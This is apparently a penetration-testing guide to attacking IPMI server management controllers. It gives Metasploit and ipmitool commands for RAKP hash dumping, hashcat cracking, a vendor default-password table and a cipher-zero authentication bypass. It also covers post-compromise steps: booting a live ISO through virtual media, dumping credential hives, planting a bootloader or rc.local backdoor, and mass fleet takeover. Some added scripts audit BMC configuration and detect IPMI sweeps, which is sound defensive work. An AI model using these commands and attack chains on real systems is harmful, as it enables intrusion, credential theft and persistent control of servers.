
IPMI

IPMI is the out-of-band management protocol baked into most enterprise server hardware - Dell iDRAC, HP iLO, IBM IMM, Supermicro IPMI/BMC. It listens on UDP 623 and provides total control of the host independent of the host’s operating system: power on/off, virtual KVM, virtual media (mount an ISO and boot from it). The protocol has multiple well-documented design flaws - the most useful being the RAKP authentication-hash retrieval which leaks password hashes without authentication.

```
# 1. UDP scan (IPMI is UDP)
sudo nmap -sU -p623 <target>
# 2. Probe with msfconsole's ipmi_version
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS <target>
msf > run
# 3. RAKP hash retrieval (CVE-2013-4786)
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set RHOSTS <target>
msf > run
# → emits hashes for every BMC user account, suitable for hashcat -m 7300
# 4. Try vendor defaults
ipmitool -I lanplus -H <target> -U admin -P admin sel list
ipmitool -I lanplus -H <target> -U ADMIN -P ADMIN user list
```

Success indicator: ipmi_dumphashes emits one hash per local BMC user, or ipmitool sel list returns the system event log. Cracking an extracted hash yields BMC admin credentials, and from there it’s full host control.

IPMI = Intelligent Platform Management Interface, defined by Intel (1998), now an open spec. The BMC (Baseboard Management Controller) is a dedicated microcontroller on the server motherboard with its own NIC, CPU, RAM, and OS - typically a small Linux running on an ASPEED or Renesas chip. It runs even when the host is powered off (as long as the chassis has power).

What the BMC provides:

| Capability | What you can do with BMC access |
|---|---|
| Power control | Power on, power off, reset, soft shutdown |
| Console / Serial-over-LAN | Watch the boot process, see kernel panics, interact with the BIOS |
| Virtual KVM | Full graphical console - keyboard, video, mouse - over the network |
| Virtual media | Mount a local ISO or floppy on the host - boot a live CD with your tools |
| Sensor monitoring | Temperature, fan speed, voltages, system event log |
| Firmware update | Flash new BIOS, BMC firmware |
| Local user accounts | Manage the BMC’s own user list (independent of host OS) |

The implication: BMC root = host root. With virtual media + reboot, you mount your live USB ISO, boot the host into your environment, and read/write any data on the host’s disks. Disk encryption at rest is the only meaningful defense against a compromised BMC, and even that often loses to a cold-boot-style attack, since BMC control amounts to physical access.

| Vendor | BMC product name | Default credentials (user / password) |
|---|---|---|
| Dell | iDRAC (Integrated Dell Remote Access Controller) | root / calvin |
| HP / HPE | iLO (Integrated Lights Out) | Administrator / random factory password (printed on a sticker, often `password`) |
| IBM / Lenovo | IMM (Integrated Management Module), IMM2, XCC | USERID / PASSW0RD (zero, not O) |
| Supermicro | IPMI / SMC IPMI | ADMIN / ADMIN |
| Cisco | CIMC (Cisco Integrated Management Controller) | admin / password |
| Fujitsu | iRMC (integrated Remote Management Controller) | admin / admin |

These defaults persist surprisingly often in production. Sysadmins rack a server, configure the host OS, and never touch the BMC after factory.

The IPMI specification mandates certain user-management defaults:

  • User slot 1 reserved for “anonymous” (no name, no password) - usually disabled but not always
  • User slot 2 is typically the named admin account
  • Up to 15 named user accounts (limit varies by vendor)
  • Each user has channel-specific privilege (Callback / User / Operator / Administrator / OEM)
  • Each user has cipher-suite policy

Default cipher suites in older IPMI 2.0 implementations include Cipher 0, which is negotiated like any other RMCP+ cipher suite but performs no authentication, integrity checking or encryption at all. Some BMCs ship with Cipher 0 enabled and accept connections that skip auth entirely.
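The user-slot and cipher-suite settings above are exactly what a BMC configuration audit should check. The following is an added example (not code from the original page) that parses the text `ipmitool lan print 1` and `ipmitool user list 1` emit and flags three things: cipher suite 0 being usable, an active anonymous user in slot 1, and every account holding ADMINISTRATOR. The sample output is constructed, but the field layout follows ipmitool's real output (`RMCP+ Cipher Suites` lists suite IDs; `Cipher Suite Priv Max` has one character per suite ID, position 0 being suite 0, with `X` meaning unused), and the remediation string uses ipmitool's real `lan set <channel> cipher_privs` command.

```python
"""Audit BMC channel/user configuration from ipmitool output (added example)."""
import re

# Constructed sample of `ipmitool lan print 1`, only the relevant lines kept.
LAN_PRINT_SAMPLE = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
IP Address Source       : Static Address
IP Address              : 10.129.14.128
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
"""

# Constructed sample of `ipmitool user list 1`; slot 1 is an anonymous user.
USER_LIST_SAMPLE = """\
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      true       USER
2   ADMIN            true    true       true       ADMINISTRATOR
3   operator         true    true       true       OPERATOR
4                    true    false      false      NO ACCESS
"""


def parse_lan_print(text):
    """Map 'Label: value' lines to a dict; continuation lines (blank label) are skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z0-9+ .]+?)\s*:\s*(.*)$", line)
        if m and m.group(1).strip():
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def cipher_zero_enabled(fields):
    """Suite 0 (no auth, no integrity, no encryption) is usable when it is listed
    in 'RMCP+ Cipher Suites' and its 'Cipher Suite Priv Max' slot is not X."""
    suites = [s.strip() for s in fields.get("RMCP+ Cipher Suites", "").split(",") if s.strip()]
    privs = fields.get("Cipher Suite Priv Max", "")
    return "0" in suites and len(privs) > 0 and privs[0] != "X"


def parse_user_list(text):
    """Parse `ipmitool user list` rows; the Name column may be blank, which shifts
    the boolean columns left by one token, so detect that case explicitly."""
    users = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].isdigit():
            continue  # header line or junk
        if tokens[1] in ("true", "false"):
            name, rest = "", tokens[1:]
        else:
            name, rest = tokens[1], tokens[2:]
        callin, link_auth, ipmi_msg = (t == "true" for t in rest[:3])
        users.append({"id": int(tokens[0]), "name": name, "callin": callin,
                      "link_auth": link_auth, "ipmi_msg": ipmi_msg,
                      "priv": " ".join(rest[3:])})  # 'NO ACCESS' is two tokens
    return users


def audit(lan_text, user_text):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    findings = []
    fields = parse_lan_print(lan_text)
    if cipher_zero_enabled(fields):
        fixed = "X" + fields["Cipher Suite Priv Max"][1:]  # disable suite 0, keep the rest
        findings.append("cipher suite 0 enabled: fix with 'ipmitool lan set 1 cipher_privs %s'" % fixed)
    for u in parse_user_list(user_text):
        anonymous = u["id"] == 1 and u["name"] == ""
        usable = u["ipmi_msg"] or u["priv"] not in ("NO ACCESS", "Unknown (0x00)")
        if anonymous and usable:
            findings.append("anonymous user slot 1 is active with priv %s" % u["priv"])
        if u["priv"] == "ADMINISTRATOR":
            findings.append("ADMINISTRATOR account: %s (id %d)" % (u["name"], u["id"]))
    return findings


if __name__ == "__main__":
    for finding in audit(LAN_PRINT_SAMPLE, USER_LIST_SAMPLE):
        print("[!]", finding)
```

Against real hardware, save `ipmitool ... lan print 1` and `ipmitool ... user list 1` to files and pass their contents to `audit()`; repeat per LAN channel, since cipher privileges and user access are set per channel.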

| Issue | What it enables |
|---|---|
| CVE-2013-4786 / RAKP | Pre-auth password-hash retrieval - design flaw, not patchable |
| Cipher 0 enabled | Auth-bypass - connect and run privileged commands without credentials |
| Default credentials unchanged | Vendor defaults work directly |
| BMC exposed to public internet | Anyone on the internet can attack it |
| BMC on same subnet as production | Compromise lateral-spreads quickly |
| Firmware not updated | BMC firmware itself contains exploitable services (web app, SSH, SNMP) |
| Anonymous null-session enabled | Some IPMI implementations allow channel 1 with empty user |
| Web UI on the BMC | Often runs old Apache, old OpenSSL, with auth-bypass and command-injection CVEs |
| Telnet enabled on BMC | Plaintext credentials, complete control via SMASH-CLP shell |
| SSH on BMC with shared default key | Many vendors ship a default SSH key - pivot via that key |

The RAKP vulnerability is the operator’s primary target - design-level (not patchable), works pre-auth, returns crackable hashes for every BMC user account.

```
sudo nmap -sU -p623 10.129.14.128
PORT    STATE         SERVICE
623/udp open|filtered asf-rmcp
```

open|filtered is the common UDP result. Confirm via Metasploit module:

```
msfconsole
msf > use auxiliary/scanner/ipmi/ipmi_version
msf > set RHOSTS 10.129.14.128
msf > run
[+] 10.129.14.128:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(2.0)
[*] Auxiliary module execution completed
```

That tells you IPMI 2.0 is running. The next step is RAKP hash retrieval.

```
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf > set RHOSTS 10.129.14.128
msf > set USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt
msf > run
[+] 10.129.14.128:623 - IPMI - Hash found: ADMIN:0a14000000000000a3b13c20...
[+] 10.129.14.128:623 - IPMI - Hash found: root:0a14000000000000bc4f9d35...
[+] 10.129.14.128:623 - IPMI - Hash found: operator:0a14000000000000ee2a..
```

The output format is `<username>:<hex hash>`. Each is an HMAC-SHA1 over a randomized challenge, keyed with the user’s password - same family as Kerberos AS-REP roasting, crackable offline.

The mechanics: the RAKP protocol exchanges a hash of the user’s password as part of the auth handshake. The flaw is that the BMC sends this hash before verifying that the requesting client knows the password - making the hash available to any client that can send well-formed RAKP messages.
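To make those mechanics concrete, here is an added toy implementation of RAKP messages 1 and 2 (not code from the page or from any vendor; session IDs, nonces and the BMC GUID are constructed sample values). The BMC side computes the RAKP message 2 authcode the way the IPMI 2.0 spec defines it, keyed with the user’s password (KUID) over fields that all travel in cleartext, and returns it before the client has proved anything (the client’s own proof is RAKP message 3). `authcode_matches` then shows that checking a candidate password needs nothing from the BMC, which is why the leak is crackable offline and why password entropy and network isolation are the only remaining controls.

```python
"""Toy RAKP 1/2 exchange illustrating the CVE-2013-4786 design flaw (added example)."""
import hashlib
import hmac
import os
import struct

ROLE_ADMIN = 0x04  # ROLEm: requested maximum privilege level (4 = Administrator)


def rakp2_authcode(password, sid_m, sid_c, r_m, r_c, guid_c, role_m, username):
    """Key Exchange Authentication Code carried in RAKP message 2:
    HMAC_KUID(SIDm || SIDc || RM || RC || GUIDc || ROLEm || ULENGTHm || UNAMEm).
    KUID is the password zero-padded to 20 bytes; HMAC zero-pads short keys
    anyway, so keying with the raw password gives the identical digest."""
    uname = username.encode()
    msg = (struct.pack("<I", sid_m) + struct.pack("<I", sid_c)   # 4-byte session IDs
           + r_m + r_c + guid_c                                   # 16-byte nonces and GUID
           + bytes([role_m, len(uname)]) + uname)
    return hmac.new(password.encode(), msg, hashlib.sha1).digest()


class BMC:
    """Managed-system side: a user database plus the RAKP message 1 handler."""

    def __init__(self, users, guid):
        self.users = users        # {username: password}, constructed
        self.guid = guid          # GUIDc, 16 bytes, constructed
        self.sid_c = 0x0002A0B1   # managed-system session ID, constructed

    def rakp1(self, sid_m, r_m, role_m, username):
        """Answer RAKP message 1 with RAKP message 2. The design flaw is here:
        the password-keyed authcode is sent before RAKP message 3, i.e. before
        the remote console has demonstrated knowledge of the password."""
        if username not in self.users:
            return None  # a real BMC returns an error status code instead
        r_c = os.urandom(16)
        auth = rakp2_authcode(self.users[username], sid_m, self.sid_c, r_m, r_c,
                              self.guid, role_m, username)
        return {"sid_c": self.sid_c, "r_c": r_c, "guid_c": self.guid, "authcode": auth}


def open_session(bmc, username, sid_m=0x0000140A, role_m=ROLE_ADMIN):
    """Remote-console side of RAKP 1/2. Returns exactly what an on-path observer
    (or the unauthenticated client itself) sees on the wire."""
    r_m = os.urandom(16)
    rakp2 = bmc.rakp1(sid_m, r_m, role_m, username)
    if rakp2 is None:
        raise ValueError("unknown user")
    return {"sid_m": sid_m, "r_m": r_m, "role_m": role_m, "username": username, **rakp2}


def authcode_matches(wire, candidate_password):
    """Recompute the RAKP 2 authcode from wire-visible values with a candidate
    password. No further contact with the BMC is needed: this is the offline
    check hashcat mode 7300 performs at scale."""
    expected = rakp2_authcode(candidate_password, wire["sid_m"], wire["sid_c"],
                              wire["r_m"], wire["r_c"], wire["guid_c"],
                              wire["role_m"], wire["username"])
    return hmac.compare_digest(expected, wire["authcode"])


if __name__ == "__main__":
    bmc = BMC({"ADMIN": "correct horse battery staple"}, guid=bytes(range(16)))
    wire = open_session(bmc, "ADMIN")
    print("authcode on the wire:", wire["authcode"].hex())
    print("offline check, right password:", authcode_matches(wire, "correct horse battery staple"))
    print("offline check, wrong password:", authcode_matches(wire, "ADMIN"))
```

Note that the exchange also leaks whether a username exists, since RAKP message 2 only carries an authcode for known users; that is the same behaviour `ipmi_dumphashes` relies on when it walks a user wordlist.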

Save the hash for hashcat:

```
$ipmi$ADMIN$0a14000000000000a3b13c20...
```

Format is $ipmi$<username>$<hex hash>. Then:

```
hashcat -m 7300 ipmi.hashes /usr/share/wordlists/rockyou.txt
```

-m 7300 is the IPMI 2.0 RAKP HMAC-SHA1 mode. Cracking rate is fast - typical hardware gets hundreds of millions of guesses per second on this mode. Most default and short passwords fall in minutes.

While hashcat works on the hashes, try the vendor defaults in parallel:

```
ipmitool -I lanplus -H 10.129.14.128 -U admin -P admin user list
```

If creds work:

```
ID  Name             Callin  Link Auth  IPMI Msg   Channel Priv Limit
1                    true    false      false      Unknown (0x00)
2   ADMIN            true    true       true       ADMINISTRATOR
3   operator         true    true       true       OPERATOR
4                    true    false      false      Unknown (0x00)
```

ipmitool is the canonical CLI:

```
# Test connection
ipmitool -I lanplus -H <target> -U admin -P admin chassis status
# System event log
ipmitool -I lanplus -H <target> -U admin -P admin sel list
# Sensor readings
ipmitool -I lanplus -H <target> -U admin -P admin sdr
# Power state
ipmitool -I lanplus -H <target> -U admin -P admin power status
# Power on
ipmitool -I lanplus -H <target> -U admin -P admin power on
# Power off
ipmitool -I lanplus -H <target> -U admin -P admin power off
# Reset (hard reboot)
ipmitool -I lanplus -H <target> -U admin -P admin power reset
# Serial-over-LAN console
ipmitool -I lanplus -H <target> -U admin -P admin sol activate
# Network configuration
ipmitool -I lanplus -H <target> -U admin -P admin lan print 1
# List BMC users
ipmitool -I lanplus -H <target> -U admin -P admin user list
# Set a user password (when you have admin auth)
ipmitool -I lanplus -H <target> -U admin -P admin user set password 2 NewPass
# Enable a user
ipmitool -I lanplus -H <target> -U admin -P admin user enable 2
```

`-I lanplus` selects the IPMI 2.0 (RMCP+) interface over LAN, which is correct for almost all modern BMCs.

If Cipher 0 is enabled, you skip authentication entirely:

```
ipmitool -I lanplus -C 0 -H 10.129.14.128 -U admin -P '' user list
```

-C 0 selects cipher zero. If it works, you can list users, change passwords, do anything - no actual auth performed.

Detection:

```
msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf > set RHOSTS 10.129.14.128
msf > run
```

Some BMCs allow an anonymous channel-1 user (the IPMI spec’s “user 1, no name, no password”):

```
ipmitool -I lanplus -H 10.129.14.128 -U '' -P '' user list
```

If this works, you’ve got read access (sometimes write) without credentials.

Every modern BMC also runs a web UI on HTTPS (sometimes HTTP). Browse to it:

https://<target>/

Vendor-specific paths and login flows:

  • iDRAC: https://target/login.html
  • iLO: https://target/login.html (older) or /ssoauth/login (newer)
  • Supermicro: https://target/cgi/login.cgi
  • IMM2/XCC: https://target/

The web UIs themselves have had numerous CVEs - auth-bypass via HTTP request smuggling, command injection in CGI handlers, SQL injection on internal databases. Run a normal HTTP scan against the BMC’s web port - it often turns up findings independent of IPMI.

Many BMCs also expose SSH (for SMASH-CLP, a vendor-specific management shell):

```
ssh admin@<target>
```

Default creds match the IPMI defaults. SMASH-CLP shell commands let you do most of what IPMI lets you do - and on some vendor implementations, you can shell-escape into the BMC’s underlying Linux.

Once you have BMC admin:

  1. Serial-over-LAN console - watch the boot, intercept BIOS prompts, modify boot order via the BMC’s chassis-boot-device command:

     ```
     ipmitool -I lanplus -H <target> -U admin -P admin chassis bootdev cdrom
     ipmitool -I lanplus -H <target> -U admin -P admin power reset
     ipmitool -I lanplus -H <target> -U admin -P admin sol activate
     ```
  2. Virtual media - through the web UI, mount a Linux live ISO from your attack box. Set bootdev to virtual CD. Reboot. You’re now booted into your own environment with the host’s disks visible.

  3. Read disks offline - once booted, the host’s drives appear as /dev/sda etc. Mount, copy SSH keys, dump SAM/SYSTEM hives (for Windows hosts), read database files.

  4. Modify host bootloader - write a backdoor into GRUB, an init script, or /etc/rc.local (for Linux) before unmounting. Boot the host normally - your backdoor activates on next boot.

  5. For domain-joined Windows - boot a live Windows PE, dump credentials from the SAM/SYSTEM hives offline (secretsdump.py against the file paths), and you have domain credentials.

The chain “exposed IPMI on public internet → RAKP hash crack → BMC admin → virtual media → domain controller compromise” is one of the most reliable cloud-data-center attack paths historically - many providers exposed BMC nets before this became widely understood.

Internet-exposed BMC → RAKP → host pwn:

  1. Shodan search port:623 for IPMI on internet
  2. ipmi_dumphashes
  3. Crack the hashes
  4. ipmitool + virtual media → host compromise

Internal BMC subnet → multi-host pwn:

  1. Inside a corporate network, identify the BMC management subnet (often 10.x.x.x/24 with hostnames like idrac-* or ilo-*)
  2. Mass ipmi_dumphashes against the subnet
  3. Many BMCs share the same admin password across the fleet
  4. Crack once, pwn all
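Both chains above have a network signature a defender can key on: UDP/623 arriving from anything other than the management jump hosts, and a single source reaching many BMCs on UDP/623 within a short window, which is what a mass `ipmi_dumphashes` run against a /24 looks like in flow data. The following is an added detection example (not from the original page) that applies both rules to constructed flow records in a generic (timestamp, src, dst, proto, dport) shape; the allowlist, BMC subnet and thresholds are assumptions to adapt to your own network.

```python
"""Flag IPMI exposure and RAKP sweeps in flow records (added example)."""
import ipaddress
from collections import defaultdict

# Assumptions for this example: jump hosts allowed to speak IPMI, and the BMC subnet.
MGMT_ALLOWLIST = [ipaddress.ip_network("10.50.0.0/24")]
BMC_SUBNET = ipaddress.ip_network("10.129.14.0/24")
SWEEP_THRESHOLD = 8   # distinct BMCs contacted by one source ...
SWEEP_WINDOW = 60     # ... within this many seconds

# Constructed sample flows: (timestamp, src, dst, proto, dst port).
FLOWS = [
    (1000, "10.50.0.10", "10.129.14.128", "udp", 623),   # jump host: expected
    (1001, "203.0.113.7", "10.129.14.128", "udp", 623),  # internet source: rule 1
    (1005, "10.20.3.44", "10.129.14.12", "tcp", 443),    # BMC web UI, not IPMI: ignored here
] + [(1010 + i, "10.20.3.44", "10.129.14.%d" % i, "udp", 623) for i in range(1, 13)]  # 12 BMCs in 12 s


def is_ipmi(flow):
    """IPMI-over-LAN (RMCP/RMCP+) is UDP/623."""
    _, _, _, proto, dport = flow
    return proto == "udp" and dport == 623


def unauthorized_sources(flows):
    """Rule 1: IPMI traffic whose source is not on the management allowlist."""
    hits = set()
    for flow in flows:
        if not is_ipmi(flow):
            continue
        src = ipaddress.ip_address(flow[1])
        if not any(src in net for net in MGMT_ALLOWLIST):
            hits.add(flow[1])
    return sorted(hits)


def sweeps(flows, threshold=SWEEP_THRESHOLD, window=SWEEP_WINDOW):
    """Rule 2: one source contacting >= threshold distinct BMCs within `window`
    seconds. Returns {src: peak distinct BMC count}."""
    per_src = defaultdict(list)  # src -> [(ts, dst)] in time order
    for ts, src, dst, proto, dport in sorted(flows):
        if is_ipmi((ts, src, dst, proto, dport)) and ipaddress.ip_address(dst) in BMC_SUBNET:
            per_src[src].append((ts, dst))
    alerts = {}
    for src, events in per_src.items():
        left = 0
        for right in range(len(events)):          # sliding window over events
            while events[right][0] - events[left][0] > window:
                left += 1
            distinct = {d for _, d in events[left:right + 1]}
            if len(distinct) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


if __name__ == "__main__":
    print("IPMI from non-management sources:", unauthorized_sources(FLOWS))
    print("sweep sources:", sweeps(FLOWS))
```

Rule 1 is the cheap one and is worth a hard block at the firewall, not just an alert: if the BMC VLAN only accepts UDP/623 from the jump hosts, the internet-exposure chain never starts. Rule 2 catches the case where an attacker already sits on the internal network and enumerates the fleet.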

BMC web UI → CVE exploit:

  1. Browser to the BMC HTTPS port
  2. Identify vendor + version from page source
  3. Check CVE database for that BMC version
  4. Many have unauth RCE in older firmware

| Task | Command |
|---|---|
| UDP scan | `sudo nmap -sU -p623 <target>` |
| IPMI version probe | `msf > use auxiliary/scanner/ipmi/ipmi_version` |
| RAKP hash dump | `msf > use auxiliary/scanner/ipmi/ipmi_dumphashes` |
| Cipher 0 test | `msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero` |
| Crack hash | `hashcat -m 7300 ipmi.hashes wordlist` |
| Test creds | `ipmitool -I lanplus -H <target> -U admin -P admin user list` |
| Chassis status | `ipmitool -I lanplus -H <target> -U <u> -P <p> chassis status` |
| Power on/off/reset | `ipmitool … power [on\|off\|reset]` |
| Serial console | `ipmitool ... sol activate` |
| Boot from CD | `ipmitool ... chassis bootdev cdrom` |
| List BMC users | `ipmitool ... user list` |
| Set password | `ipmitool ... user set password <id> <pass>` |
| Sensors | `ipmitool ... sdr` |
| Event log | `ipmitool ... sel list` |